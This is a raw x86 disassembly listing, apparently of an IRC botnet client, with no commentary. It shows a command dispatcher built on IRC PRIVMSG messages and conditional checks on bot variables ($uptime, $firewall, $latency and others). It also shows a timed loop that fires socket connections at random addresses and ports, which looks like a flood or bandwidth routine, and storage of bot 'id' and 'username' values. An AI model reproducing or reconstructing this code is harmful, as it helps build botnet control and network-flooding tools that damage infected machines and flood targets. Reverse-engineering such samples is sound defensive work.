push dword ptr [eax+18h]
call ds:dword_41DF58 ; getnameinfo
test eax, eax
jnz short loc_40C1A9
push [ebp+var_5F84]
call ds:dword_41DF5C ; freeaddrinfo
mov eax, [ebp+arg_14]
mov eax, [eax+4]
movsx eax, byte ptr [eax]
test eax, eax
jz short loc_40C179
mov eax, [ebp+arg_14]
mov eax, [eax+4]
mov [ebp+var_6404], eax
jmp short loc_40C183
; ---------------------------------------------------------------------------
loc_40C179: ; CODE XREF: sub_40A9CF+179A�j
mov [ebp+var_6404], offset dword_419968
loc_40C183: ; CODE XREF: sub_40A9CF+17A8�j
lea eax, [ebp+var_6388]
push eax
push [ebp+var_6404]
push offset dword_4198A8
lea eax, [ebp+var_1A4]
push eax
call sub_40D53F
add esp, 10h
jmp loc_40C912
; ---------------------------------------------------------------------------
loc_40C1A9: ; CODE XREF: sub_40A9CF+1781�j
push [ebp+var_5F84]
call ds:dword_41DF5C ; freeaddrinfo
loc_40C1B5: ; CODE XREF: sub_40A9CF+174F�j
mov eax, [ebp+arg_14]
push dword ptr [eax+4]
push offset dword_4198D0
lea eax, [ebp+var_1A4]
push eax
call sub_40D53F
add esp, 0Ch
jmp loc_40C912
; ---------------------------------------------------------------------------
loc_40C1D4: ; CODE XREF: sub_40A9CF+171D�j
mov eax, [ebp+var_1A8]
sub eax, ds:dword_419898
neg eax
sbb eax, eax
inc eax
test eax, eax
jz loc_40C37A
mov eax, [ebp+arg_14]
cmp dword ptr [eax+4], 0
jz short loc_40C207
mov eax, [ebp+arg_14]
push dword ptr [eax+4]
call sub_416B40 ; strlen
pop ecx
cmp eax, 0Ah
ja short loc_40C20C
loc_40C207: ; CODE XREF: sub_40A9CF+1825�j
jmp loc_40C912
; ---------------------------------------------------------------------------
loc_40C20C: ; CODE XREF: sub_40A9CF+1836�j
mov eax, [ebp+arg_14]
push dword ptr [eax+4]
call sub_416B40 ; strlen
pop ecx
mov [ebp+var_638C], eax
push 4
push offset a2002 ; "2002"
mov eax, [ebp+arg_14]
push dword ptr [eax+4]
call sub_416DEA ; memcmp
add esp, 0Ch
test eax, eax
jnz loc_40C35B
mov eax, [ebp+arg_14]
mov eax, [eax+4]
mov ecx, [ebp+var_638C]
mov al, [eax+ecx-9]
mov [ebp+var_6398], al
mov eax, [ebp+arg_14]
mov eax, [eax+4]
mov ecx, [ebp+var_638C]
mov al, [eax+ecx-8]
mov [ebp+var_6397], al
and [ebp+var_6396], 0
mov eax, [ebp+arg_14]
mov eax, [eax+4]
mov ecx, [ebp+var_638C]
mov al, [eax+ecx-7]
mov [ebp+var_6395], al
mov eax, [ebp+arg_14]
mov eax, [eax+4]
mov ecx, [ebp+var_638C]
mov al, [eax+ecx-6]
mov [ebp+var_6394], al
and [ebp+var_6393], 0
mov eax, [ebp+arg_14]
mov eax, [eax+4]
mov ecx, [ebp+var_638C]
mov al, [eax+ecx-4]
mov [ebp+var_6392], al
mov eax, [ebp+arg_14]
mov eax, [eax+4]
mov ecx, [ebp+var_638C]
mov al, [eax+ecx-3]
mov [ebp+var_6391], al
and [ebp+var_6390], 0
mov eax, [ebp+arg_14]
mov eax, [eax+4]
mov ecx, [ebp+var_638C]
mov al, [eax+ecx-2]
mov [ebp+var_638F], al
mov eax, [ebp+arg_14]
mov eax, [eax+4]
mov ecx, [ebp+var_638C]
mov al, [eax+ecx-1]
mov [ebp+var_638E], al
and [ebp+var_638D], 0
lea eax, [ebp+var_638F]
push eax
call sub_40A8AD
pop ecx
push eax
lea eax, [ebp+var_6392]
push eax
call sub_40A8AD
pop ecx
push eax
lea eax, [ebp+var_6395]
push eax
call sub_40A8AD
pop ecx
push eax
lea eax, [ebp+var_6398]
push eax
call sub_40A8AD
pop ecx
push eax
mov eax, [ebp+arg_14]
push dword ptr [eax+4]
push offset dword_419860
lea eax, [ebp+var_1A4]
push eax
call sub_40D53F
add esp, 1Ch
jmp short loc_40C375
; ---------------------------------------------------------------------------
loc_40C35B: ; CODE XREF: sub_40A9CF+1866�j
mov eax, [ebp+arg_14]
push dword ptr [eax+4]
push offset dword_419844
lea eax, [ebp+var_1A4]
push eax
call sub_40D53F
add esp, 0Ch
loc_40C375: ; CODE XREF: sub_40A9CF+198A�j
jmp loc_40C912
; ---------------------------------------------------------------------------
loc_40C37A: ; CODE XREF: sub_40A9CF+1818�j
mov eax, [ebp+var_1A8]
sub eax, ds:dword_419838
neg eax
sbb eax, eax
inc eax
test eax, eax
jz loc_40C4B0
call sub_416B64 ; clock
mov [ebp+var_639C], eax
and [ebp+var_63A4], 0
and [ebp+var_63A0], 0
push 10h
push 0
lea eax, [ebp+var_63B4]
push eax
call sub_416B6A ; memset
add esp, 0Ch
mov [ebp+var_63B4], 2
loc_40C3C8: ; CODE XREF: sub_40A9CF+1A95�j
call sub_416B64 ; clock
sub eax, [ebp+var_639C]
cmp eax, 3E8h
jnb loc_40C469
push 0FFFFh
push 1
call sub_4103F5
pop ecx
pop ecx
push eax
call ds:dword_417238 ; htons
mov [ebp+var_63B2], ax
push 4
push 0
call sub_4040E8
pop ecx
pop ecx
mov [ebp+var_63B0], eax
push 0
push 2
push 2
call ds:dword_417218 ; socket
mov [ebp+var_63B8], eax
push 10h
lea eax, [ebp+var_63B4]
push eax
push [ebp+var_63B8]
call ds:dword_4171F4 ; connect
push 0
push 1
lea eax, [ebp+var_63A0]
push eax
push [ebp+var_63B8]
call ds:dword_41720C ; send
push [ebp+var_63B8]
call ds:dword_417230 ; closesocket
mov eax, [ebp+var_63A4]
add eax, 2Bh
mov [ebp+var_63A4], eax
jmp loc_40C3C8
; ---------------------------------------------------------------------------
loc_40C469: ; CODE XREF: sub_40A9CF+1A09�j
cmp [ebp+var_63A4], 400h
jbe short loc_40C483
mov eax, [ebp+var_63A4]
mov [ebp+var_6408], eax
jmp short loc_40C48D
; ---------------------------------------------------------------------------
loc_40C483: ; CODE XREF: sub_40A9CF+1AA4�j
mov [ebp+var_6408], 400h
loc_40C48D: ; CODE XREF: sub_40A9CF+1AB2�j
mov eax, [ebp+var_6408]
shr eax, 0Ah
push eax
push offset dword_419820
lea eax, [ebp+var_1A4]
push eax
call sub_40D53F
add esp, 0Ch
jmp loc_40C912
; ---------------------------------------------------------------------------
loc_40C4B0: ; CODE XREF: sub_40A9CF+19BE�j
mov eax, [ebp+var_1A8]
sub eax, ds:dword_419818
neg eax
sbb eax, eax
inc eax
test eax, eax
jnz short loc_40C4DA
mov eax, [ebp+var_1A8]
sub eax, ds:dword_41980C
neg eax
sbb eax, eax
inc eax
test eax, eax
jz short loc_40C4FF
loc_40C4DA: ; CODE XREF: sub_40A9CF+1AF4�j
push offset dword_41DD08
push 3B7h
push 0
push offset dword_4197E8
lea eax, [ebp+var_1A4]
push eax
call sub_40D53F
add esp, 14h
jmp loc_40C912
; ---------------------------------------------------------------------------
loc_40C4FF: ; CODE XREF: sub_40A9CF+1B09�j
mov eax, [ebp+var_1A8]
sub eax, ds:dword_4197DC
neg eax
sbb eax, eax
inc eax
test eax, eax
jz short loc_40C53A
mov eax, [ebp+arg_14]
push dword ptr [eax+0Ch]
mov eax, [ebp+arg_14]
push dword ptr [eax+8]
mov eax, [ebp+arg_14]
push dword ptr [eax+4]
lea eax, [ebp+var_1A4]
push eax
call sub_4142BF
add esp, 10h
jmp loc_40C912
; ---------------------------------------------------------------------------
loc_40C53A: ; CODE XREF: sub_40A9CF+1B43�j
mov eax, [ebp+var_1A8]
sub eax, ds:dword_4197D4
neg eax
sbb eax, eax
inc eax
test eax, eax
jnz short loc_40C564
mov eax, [ebp+var_1A8]
sub eax, ds:dword_4197C8
neg eax
sbb eax, eax
inc eax
test eax, eax
jz short loc_40C576
loc_40C564: ; CODE XREF: sub_40A9CF+1B7E�j
lea eax, [ebp+var_1A4]
push eax
call sub_4087C4
pop ecx
jmp loc_40C912
; ---------------------------------------------------------------------------
loc_40C576: ; CODE XREF: sub_40A9CF+1B93�j
mov eax, [ebp+var_1A8]
sub eax, ds:dword_4197C0
neg eax
sbb eax, eax
inc eax
test eax, eax
jnz short loc_40C5A0
mov eax, [ebp+var_1A8]
sub eax, ds:dword_4197B4
neg eax
sbb eax, eax
inc eax
test eax, eax
jz short loc_40C5B2
loc_40C5A0: ; CODE XREF: sub_40A9CF+1BBA�j
lea eax, [ebp+var_1A4]
push eax
call sub_408E4A
pop ecx
jmp loc_40C912
; ---------------------------------------------------------------------------
loc_40C5B2: ; CODE XREF: sub_40A9CF+1BCF�j
mov eax, [ebp+var_1A8]
sub eax, ds:dword_4197A4
neg eax
sbb eax, eax
inc eax
test eax, eax
jz short loc_40C614
push 1
push offset a9252 ; "9252"
call sub_4046BC
pop ecx
pop ecx
mov [ebp+var_63BC], eax
push [ebp+var_63BC]
push offset dword_418B5C
lea eax, [ebp+var_1A4]
push eax
call sub_40D53F
add esp, 0Ch
cmp [ebp+var_63BC], 0
jnz short loc_40C603
jmp loc_40C912
; ---------------------------------------------------------------------------
loc_40C603: ; CODE XREF: sub_40A9CF+1C2D�j
push [ebp+var_63BC]
call sub_404CBB
pop ecx
jmp loc_40C912
; ---------------------------------------------------------------------------
loc_40C614: ; CODE XREF: sub_40A9CF+1BF6�j
mov eax, [ebp+var_1A8]
sub eax, ds:dword_419790
neg eax
sbb eax, eax
inc eax
test eax, eax
jz short loc_40C63B
lea eax, [ebp+var_1A4]
push eax
call sub_4091E2
pop ecx
jmp loc_40C912
; ---------------------------------------------------------------------------
loc_40C63B: ; CODE XREF: sub_40A9CF+1C58�j
mov eax, [ebp+var_1A8]
sub eax, ds:dword_419788
neg eax
sbb eax, eax
inc eax
test eax, eax
jnz short loc_40C669
mov eax, [ebp+var_1A8]
sub eax, ds:dword_41977C
neg eax
sbb eax, eax
inc eax
test eax, eax
jz loc_40C896
loc_40C669: ; CODE XREF: sub_40A9CF+1C7F�j
mov eax, [ebp+arg_14]
cmp dword ptr [eax+4], 0
jz short loc_40C686
mov eax, [ebp+arg_14]
push dword ptr [eax+4]
call sub_416B9C ; atoi
pop ecx
mov [ebp+var_640C], eax
jmp short loc_40C68D
; ---------------------------------------------------------------------------
loc_40C686: ; CODE XREF: sub_40A9CF+1CA1�j
and [ebp+var_640C], 0
loc_40C68D: ; CODE XREF: sub_40A9CF+1CB5�j
mov eax, [ebp+var_640C]
mov [ebp+var_63C8], eax
call sub_4092A4
mov [ebp+var_63E0], eax
mov eax, [ebp+var_63E0]
xor edx, edx
mov ecx, 15180h
div ecx
mov [ebp+var_63D8], eax
mov eax, [ebp+var_63E0]
xor edx, edx
mov ecx, 15180h
div ecx
mov eax, edx
xor edx, edx
mov ecx, 0E10h
div ecx
mov [ebp+var_63C4], eax
mov eax, [ebp+var_63E0]
xor edx, edx
mov ecx, 15180h
div ecx
mov eax, edx
xor edx, edx
mov ecx, 0E10h
div ecx
mov eax, edx
xor edx, edx
push 3Ch
pop ecx
div ecx
mov [ebp+var_63D4], eax
mov eax, [ebp+var_63D8]
cmp eax, [ebp+var_63C8]
jnb short loc_40C715
jmp loc_40C912
; ---------------------------------------------------------------------------
loc_40C715: ; CODE XREF: sub_40A9CF+1D3F�j
call sub_409318
mov [ebp+var_63C0], eax
mov eax, [ebp+var_63C0]
xor edx, edx
mov ecx, 15180h
div ecx
mov [ebp+var_63CC], eax
mov eax, [ebp+var_63C0]
xor edx, edx
mov ecx, 15180h
div ecx
mov eax, edx
xor edx, edx
mov ecx, 0E10h
div ecx
mov [ebp+var_63DC], eax
mov eax, [ebp+var_63C0]
xor edx, edx
mov ecx, 15180h
div ecx
mov eax, edx
xor edx, edx
mov ecx, 0E10h
div ecx
mov eax, edx
xor edx, edx
push 3Ch
pop ecx
div ecx
mov [ebp+var_63D0], eax
cmp [ebp+var_63D0], 1
jnz short loc_40C793
mov [ebp+var_6410], offset byte_41DF00
jmp short loc_40C79D
; ---------------------------------------------------------------------------
loc_40C793: ; CODE XREF: sub_40A9CF+1DB6�j
mov [ebp+var_6410], offset dword_4191F4
loc_40C79D: ; CODE XREF: sub_40A9CF+1DC2�j
cmp [ebp+var_63DC], 1
jnz short loc_40C7B2
mov [ebp+var_6414], offset byte_41DF00
jmp short loc_40C7BC
; ---------------------------------------------------------------------------
loc_40C7B2: ; CODE XREF: sub_40A9CF+1DD5�j
mov [ebp+var_6414], offset dword_4191F4
loc_40C7BC: ; CODE XREF: sub_40A9CF+1DE1�j
cmp [ebp+var_63CC], 1
jnz short loc_40C7D1
mov [ebp+var_6418], offset byte_41DF00
jmp short loc_40C7DB
; ---------------------------------------------------------------------------
loc_40C7D1: ; CODE XREF: sub_40A9CF+1DF4�j
mov [ebp+var_6418], offset dword_4191F4
loc_40C7DB: ; CODE XREF: sub_40A9CF+1E00�j
cmp [ebp+var_63D4], 1
jnz short loc_40C7F0
mov [ebp+var_641C], offset byte_41DF00
jmp short loc_40C7FA
; ---------------------------------------------------------------------------
loc_40C7F0: ; CODE XREF: sub_40A9CF+1E13�j
mov [ebp+var_641C], offset dword_4191F4
loc_40C7FA: ; CODE XREF: sub_40A9CF+1E1F�j
cmp [ebp+var_63C4], 1
jnz short loc_40C80F
mov [ebp+var_6420], offset byte_41DF00
jmp short loc_40C819
; ---------------------------------------------------------------------------
loc_40C80F: ; CODE XREF: sub_40A9CF+1E32�j
mov [ebp+var_6420], offset dword_4191F4
loc_40C819: ; CODE XREF: sub_40A9CF+1E3E�j
cmp [ebp+var_63D8], 1
jnz short loc_40C82E
mov [ebp+var_6424], offset byte_41DF00
jmp short loc_40C838
; ---------------------------------------------------------------------------
loc_40C82E: ; CODE XREF: sub_40A9CF+1E51�j
mov [ebp+var_6424], offset dword_4191F4
loc_40C838: ; CODE XREF: sub_40A9CF+1E5D�j
push [ebp+var_6410]
push [ebp+var_63D0]
push [ebp+var_6414]
push [ebp+var_63DC]
push [ebp+var_6418]
push [ebp+var_63CC]
push [ebp+var_641C]
push [ebp+var_63D4]
push [ebp+var_6420]
push [ebp+var_63C4]
push [ebp+var_6424]
push [ebp+var_63D8]
push offset dword_419708
lea eax, [ebp+var_1A4]
push eax
call sub_40D53F
add esp, 38h
jmp short loc_40C912
; ---------------------------------------------------------------------------
loc_40C896: ; CODE XREF: sub_40A9CF+1C94�j
mov eax, [ebp+var_1A8]
sub eax, ds:dword_419700
neg eax
sbb eax, eax
inc eax
test eax, eax
jz short loc_40C912
mov eax, [ebp+arg_14]
cmp dword ptr [eax+4], 0
jz short loc_40C8BD
mov eax, [ebp+arg_14]
cmp dword ptr [eax+8], 0
jnz short loc_40C8BF
loc_40C8BD: ; CODE XREF: sub_40A9CF+1EE3�j
jmp short loc_40C912
; ---------------------------------------------------------------------------
loc_40C8BF: ; CODE XREF: sub_40A9CF+1EEC�j
push 2
push offset aId ; "id"
mov eax, [ebp+arg_14]
push dword ptr [eax+4]
call sub_416F80 ; _strnicmp
add esp, 0Ch
test eax, eax
jnz short loc_40C8EA
mov eax, [ebp+arg_14]
push dword ptr [eax+8]
push offset byte_41EF98
call sub_416B3A ; _mbscpy
pop ecx
pop ecx
loc_40C8EA: ; CODE XREF: sub_40A9CF+1F07�j
push offset aUsername ; "username"
mov eax, [ebp+arg_14]
push dword ptr [eax+4]
call sub_416F74 ; _strcmpi
pop ecx
pop ecx
test eax, eax
jnz short loc_40C912
mov eax, [ebp+arg_14]
push dword ptr [eax+8]
push offset byte_41F118
call sub_416B3A ; _mbscpy
pop ecx
pop ecx
loc_40C912: ; CODE XREF: sub_40A9CF+85�j
; sub_40A9CF+D8�j ...
pop edi
pop esi
leave
retn
sub_40A9CF endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_40C916 proc near ; CODE XREF: sub_40CA29+47F�p
arg_0 = dword ptr 8
push ebp
mov ebp, esp
loc_40C919: ; CODE XREF: sub_40C916+1F�j
mov eax, [ebp+arg_0]
movsx eax, byte ptr [eax]
cmp eax, 20h
jnz short loc_40C937
mov eax, [ebp+arg_0]
movsx eax, byte ptr [eax]
test eax, eax
jz short loc_40C937
mov eax, [ebp+arg_0]
inc eax
mov [ebp+arg_0], eax
jmp short loc_40C919
; ---------------------------------------------------------------------------
loc_40C937: ; CODE XREF: sub_40C916+C�j
; sub_40C916+16�j
mov eax, [ebp+arg_0]
pop ebp
retn
sub_40C916 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_40C93C proc near ; DATA XREF: sub_40CEB0+66�o
var_534 = dword ptr -534h
var_530 = byte ptr -530h
var_38F = byte ptr -38Fh
var_20C = dword ptr -20Ch
var_208 = byte ptr -208h
var_204 = dword ptr -204h
var_200 = byte ptr -200h
arg_0 = dword ptr 8
push ebp
mov ebp, esp
sub esp, 534h
push 327h
push [ebp+arg_0]
lea eax, [ebp+var_534]
push eax
call sub_416B52 ; memcpy
add esp, 0Ch
push [ebp+arg_0]
call sub_416B4C ; free
pop ecx
lea eax, [ebp+var_208]
push eax
push offset asc_419F48 ; ";"
lea eax, [ebp+var_530]
push eax
call sub_40813C
add esp, 0Ch
mov [ebp+var_204], eax
and [ebp+var_20C], 0
loc_40C98D: ; CODE XREF: sub_40C93C+D6�j
cmp [ebp+var_204], 0
jnz short loc_40C998
jmp short loc_40CA17
; ---------------------------------------------------------------------------
loc_40C998: ; CODE XREF: sub_40C93C+58�j
; sub_40C93C+79�j
mov eax, [ebp+var_204]
movsx eax, byte ptr [eax]
cmp eax, 20h
jz short loc_40C9A8
jmp short loc_40C9B7
; ---------------------------------------------------------------------------
loc_40C9A8: ; CODE XREF: sub_40C93C+68�j
mov eax, [ebp+var_204]
inc eax
mov [ebp+var_204], eax
jmp short loc_40C998
; ---------------------------------------------------------------------------
loc_40C9B7: ; CODE XREF: sub_40C93C+6A�j
push [ebp+var_204]
lea eax, [ebp+var_38F]
push eax
push offset aLinkLink@linkP ; "link!link@link PRIVMSG %s :%s"
push 200h
lea eax, [ebp+var_200]
push eax
call sub_416BAE ; _snprintf
add esp, 14h
lea eax, [ebp+var_200]
push eax
call sub_40E618
pop ecx
lea eax, [ebp+var_208]
push eax
push offset asc_419F48 ; ";"
push 0
call sub_40813C
add esp, 0Ch
mov [ebp+var_20C], eax
mov eax, [ebp+var_20C]
mov [ebp+var_204], eax
jmp loc_40C98D
; ---------------------------------------------------------------------------
loc_40CA17: ; CODE XREF: sub_40C93C+5A�j
push [ebp+var_534]
call sub_409763
pop ecx
xor eax, eax
leave
retn 4
sub_40C93C endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_40CA29 proc near ; CODE XREF: sub_40CEB0+8�p
var_1EC = dword ptr -1ECh
var_1E8 = byte ptr -1E8h
var_1C8 = byte ptr -1C8h
var_1A8 = dword ptr -1A8h
var_1A4 = dword ptr -1A4h
var_1A0 = byte ptr -1A0h
var_190 = byte ptr -190h
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
var_8 = byte ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
push ebp
mov ebp, esp
sub esp, 1ECh
cmp [ebp+arg_0], 0
jz short loc_40CA43
mov eax, [ebp+arg_0]
movsx eax, byte ptr [eax]
cmp eax, 28h
jz short loc_40CA4A
loc_40CA43: ; CODE XREF: sub_40CA29+D�j
xor eax, eax
jmp locret_40CEAE
; ---------------------------------------------------------------------------
loc_40CA4A: ; CODE XREF: sub_40CA29+18�j
mov eax, [ebp+arg_0]
inc eax
mov [ebp+arg_0], eax
push offset asc_419FB0 ; ")"
push [ebp+arg_0]
call sub_416BA8 ; strstr
pop ecx
pop ecx
mov [ebp+var_10], eax
cmp [ebp+var_10], 0
jnz short loc_40CA70
xor eax, eax
jmp locret_40CEAE
; ---------------------------------------------------------------------------
loc_40CA70: ; CODE XREF: sub_40CA29+3E�j
mov eax, [ebp+var_10]
sub eax, [ebp+arg_0]
inc eax
cmp eax, 180h
jbe short loc_40CA8A
mov [ebp+var_1EC], 180h
jmp short loc_40CA97
; ---------------------------------------------------------------------------
loc_40CA8A: ; CODE XREF: sub_40CA29+53�j
mov eax, [ebp+var_10]
sub eax, [ebp+arg_0]
inc eax
mov [ebp+var_1EC], eax
loc_40CA97: ; CODE XREF: sub_40CA29+5F�j
push [ebp+var_1EC]
push [ebp+arg_0]
lea eax, [ebp+var_190]
push eax
call sub_407A56
add esp, 0Ch
push 1
push 1
lea eax, [ebp+var_190]
push eax
call sub_407C2C
add esp, 0Ch
lea eax, [ebp+var_8]
push eax
push offset asc_419FAC ; "&&"
lea eax, [ebp+var_190]
push eax
call sub_40813C
add esp, 0Ch
mov [ebp+var_4], eax
and [ebp+var_C], 0
loc_40CAE1: ; CODE XREF: sub_40CA29+475�j
cmp [ebp+var_4], 0
jnz short loc_40CAEC
jmp loc_40CEA3
; ---------------------------------------------------------------------------
loc_40CAEC: ; CODE XREF: sub_40CA29+BC�j
; sub_40CA29+D7�j
mov eax, [ebp+var_4]
movsx eax, byte ptr [eax]
cmp eax, 20h
jz short loc_40CAF9
jmp short loc_40CB02
; ---------------------------------------------------------------------------
loc_40CAF9: ; CODE XREF: sub_40CA29+CC�j
mov eax, [ebp+var_4]
inc eax
mov [ebp+var_4], eax
jmp short loc_40CAEC
; ---------------------------------------------------------------------------
loc_40CB02: ; CODE XREF: sub_40CA29+CE�j
lea eax, [ebp+var_1E8]
push eax
lea eax, [ebp+var_1A0]
push eax
lea eax, [ebp+var_1C8]
push eax
push offset a32s16s32s ; "%32s %16s %32s"
push [ebp+var_4]
call sub_416BA2 ; sscanf
add esp, 14h
cmp eax, 3
jz short loc_40CB33
xor eax, eax
jmp locret_40CEAE
; ---------------------------------------------------------------------------
loc_40CB33: ; CODE XREF: sub_40CA29+101�j
lea eax, [ebp+var_1C8]
push eax
call sub_416B9C ; atoi
pop ecx
mov [ebp+var_1A4], eax
lea eax, [ebp+var_1E8]
push eax
call sub_416B9C ; atoi
pop ecx
mov [ebp+var_1A8], eax
cmp [ebp+var_1A4], 0
jnz loc_40CC6E
push offset dword_418F50
lea eax, [ebp+var_1C8]
push eax
call sub_416F74 ; _strcmpi
pop ecx
pop ecx
test eax, eax
jz loc_40CC6E
push offset aUptime ; "$uptime"
lea eax, [ebp+var_1C8]
push eax
call sub_416F74 ; _strcmpi
pop ecx
pop ecx
test eax, eax
jnz short loc_40CBB1
call sub_4092A4
xor edx, edx
mov ecx, 15180h
div ecx
mov [ebp+var_1A4], eax
jmp loc_40CC6E
; ---------------------------------------------------------------------------
loc_40CBB1: ; CODE XREF: sub_40CA29+16D�j
push offset aVersion ; "$version"
lea eax, [ebp+var_1C8]
push eax
call sub_416F74 ; _strcmpi
pop ecx
pop ecx
test eax, eax
jnz short loc_40CBD7
mov [ebp+var_1A4], 3B7h
jmp loc_40CC6E
; ---------------------------------------------------------------------------
loc_40CBD7: ; CODE XREF: sub_40CA29+19D�j
push offset aFree ; "$free"
lea eax, [ebp+var_1C8]
push eax
call sub_416F74 ; _strcmpi
pop ecx
pop ecx
test eax, eax
jnz short loc_40CBFB
call sub_408E8E
mov [ebp+var_1A4], eax
jmp short loc_40CC6E
; ---------------------------------------------------------------------------
loc_40CBFB: ; CODE XREF: sub_40CA29+1C3�j
push offset aLatency ; "$latency"
lea eax, [ebp+var_1C8]
push eax
call sub_416F74 ; _strcmpi
pop ecx
pop ecx
test eax, eax
jnz short loc_40CC1F
call sub_408887
mov [ebp+var_1A4], eax
jmp short loc_40CC6E
; ---------------------------------------------------------------------------
loc_40CC1F: ; CODE XREF: sub_40CA29+1E7�j
push offset aFirewall ; "$firewall"
lea eax, [ebp+var_1C8]
push eax
call sub_416F74 ; _strcmpi
pop ecx
pop ecx
test eax, eax
jnz short loc_40CC43
call sub_404279
mov [ebp+var_1A4], eax
jmp short loc_40CC6E
; ---------------------------------------------------------------------------
loc_40CC43: ; CODE XREF: sub_40CA29+20B�j
push offset aIpv6 ; "$ipv6"
lea eax, [ebp+var_1C8]
push eax
call sub_416F74 ; _strcmpi
pop ecx
pop ecx
test eax, eax
jnz short loc_40CC67
call sub_4043E9
mov [ebp+var_1A4], eax
jmp short loc_40CC6E
; ---------------------------------------------------------------------------
loc_40CC67: ; CODE XREF: sub_40CA29+22F�j
xor eax, eax
jmp locret_40CEAE
; ---------------------------------------------------------------------------
loc_40CC6E: ; CODE XREF: sub_40CA29+137�j
; sub_40CA29+152�j ...
cmp [ebp+var_1A8], 0
jnz loc_40CD83
push offset dword_418F50
lea eax, [ebp+var_1E8]
push eax
call sub_416F74 ; _strcmpi
pop ecx
pop ecx
test eax, eax
jz loc_40CD83
push offset aUptime ; "$uptime"
lea eax, [ebp+var_1E8]
push eax
call sub_416F74 ; _strcmpi
pop ecx
pop ecx
test eax, eax
jnz short loc_40CCC6
call sub_4092A4
xor edx, edx
mov ecx, 15180h
div ecx
mov [ebp+var_1A8], eax
jmp loc_40CD83
; ---------------------------------------------------------------------------
loc_40CCC6: ; CODE XREF: sub_40CA29+282�j
push offset aVersion ; "$version"
lea eax, [ebp+var_1E8]
push eax
call sub_416F74 ; _strcmpi
pop ecx
pop ecx
test eax, eax
jnz short loc_40CCEC
mov [ebp+var_1A8], 3B7h
jmp loc_40CD83
; ---------------------------------------------------------------------------
loc_40CCEC: ; CODE XREF: sub_40CA29+2B2�j
push offset aFree ; "$free"
lea eax, [ebp+var_1E8]
push eax
call sub_416F74 ; _strcmpi
pop ecx
pop ecx
test eax, eax
jnz short loc_40CD10
call sub_408E8E
mov [ebp+var_1A8], eax
jmp short loc_40CD83
; ---------------------------------------------------------------------------
loc_40CD10: ; CODE XREF: sub_40CA29+2D8�j
push offset aLatency ; "$latency"
lea eax, [ebp+var_1E8]
push eax
call sub_416F74 ; _strcmpi
pop ecx
pop ecx
test eax, eax
jnz short loc_40CD34
call sub_408887
mov [ebp+var_1A8], eax
jmp short loc_40CD83
; ---------------------------------------------------------------------------
loc_40CD34: ; CODE XREF: sub_40CA29+2FC�j
push offset aFirewall ; "$firewall"
lea eax, [ebp+var_1E8]
push eax
call sub_416F74 ; _strcmpi
pop ecx
pop ecx
test eax, eax
jnz short loc_40CD58
call sub_404279
mov [ebp+var_1A8], eax
jmp short loc_40CD83
; ---------------------------------------------------------------------------
loc_40CD58: ; CODE XREF: sub_40CA29+320�j
push offset aIpv6 ; "$ipv6"
lea eax, [ebp+var_1E8]
push eax
call sub_416F74 ; _strcmpi
pop ecx
pop ecx
test eax, eax
jnz short loc_40CD7C
call sub_4043E9
mov [ebp+var_1A8], eax
jmp short loc_40CD83
; ---------------------------------------------------------------------------
loc_40CD7C: ; CODE XREF: sub_40CA29+344�j
xor eax, eax
jmp locret_40CEAE
; ---------------------------------------------------------------------------
loc_40CD83: ; CODE XREF: sub_40CA29+24C�j
; sub_40CA29+267�j ...
push offset asc_419F5C ; "=="
lea eax, [ebp+var_1A0]
push eax
call sub_416F74 ; _strcmpi
pop ecx
pop ecx
test eax, eax
jnz short loc_40CDAF
mov eax, [ebp+var_1A4]
cmp eax, [ebp+var_1A8]
jz short loc_40CDAF
xor eax, eax
jmp locret_40CEAE
; ---------------------------------------------------------------------------
loc_40CDAF: ; CODE XREF: sub_40CA29+36F�j
; sub_40CA29+37D�j
push offset asc_419F58 ; "!="
lea eax, [ebp+var_1A0]
push eax
call sub_416F74 ; _strcmpi
pop ecx
pop ecx
test eax, eax
jnz short loc_40CDDB
mov eax, [ebp+var_1A4]
cmp eax, [ebp+var_1A8]
jnz short loc_40CDDB
xor eax, eax
jmp locret_40CEAE
; ---------------------------------------------------------------------------
loc_40CDDB: ; CODE XREF: sub_40CA29+39B�j
; sub_40CA29+3A9�j
push offset asc_419F54 ; ">"
lea eax, [ebp+var_1A0]
push eax
call sub_416F74 ; _strcmpi
pop ecx
pop ecx
test eax, eax
jnz short loc_40CE07
mov eax, [ebp+var_1A4]
cmp eax, [ebp+var_1A8]
ja short loc_40CE07
xor eax, eax
jmp locret_40CEAE
; ---------------------------------------------------------------------------
loc_40CE07: ; CODE XREF: sub_40CA29+3C7�j
; sub_40CA29+3D5�j
push offset asc_419F50 ; ">="
lea eax, [ebp+var_1A0]
push eax
call sub_416F74 ; _strcmpi
pop ecx
pop ecx
test eax, eax
jnz short loc_40CE30
mov eax, [ebp+var_1A4]
cmp eax, [ebp+var_1A8]
jnb short loc_40CE30
xor eax, eax
jmp short locret_40CEAE
; ---------------------------------------------------------------------------
loc_40CE30: ; CODE XREF: sub_40CA29+3F3�j
; sub_40CA29+401�j
push offset dword_419968
lea eax, [ebp+var_1A0]
push eax
call sub_416F74 ; _strcmpi
pop ecx
pop ecx
test eax, eax
jnz short loc_40CE59
mov eax, [ebp+var_1A4]
cmp eax, [ebp+var_1A8]
jb short loc_40CE59
xor eax, eax
jmp short locret_40CEAE
; ---------------------------------------------------------------------------
loc_40CE59: ; CODE XREF: sub_40CA29+41C�j
; sub_40CA29+42A�j
push offset asc_419F4C ; "<="
lea eax, [ebp+var_1A0]
push eax
call sub_416F74 ; _strcmpi
pop ecx
pop ecx
test eax, eax
jnz short loc_40CE82
mov eax, [ebp+var_1A4]
cmp eax, [ebp+var_1A8]
jbe short loc_40CE82
xor eax, eax
jmp short locret_40CEAE
; ---------------------------------------------------------------------------
loc_40CE82: ; CODE XREF: sub_40CA29+445�j
; sub_40CA29+453�j
lea eax, [ebp+var_8]
push eax
push offset asc_419FAC ; "&&"
push 0
call sub_40813C
add esp, 0Ch
mov [ebp+var_C], eax
mov eax, [ebp+var_C]
mov [ebp+var_4], eax
jmp loc_40CAE1
; ---------------------------------------------------------------------------
loc_40CEA3: ; CODE XREF: sub_40CA29+BE�j
mov eax, [ebp+var_10]
inc eax
push eax
call sub_40C916
pop ecx
locret_40CEAE: ; CODE XREF: sub_40CA29+1C�j
; sub_40CA29+42�j ...
leave
retn
sub_40CA29 endp
; =============== S U B R O U T I N E =======================================
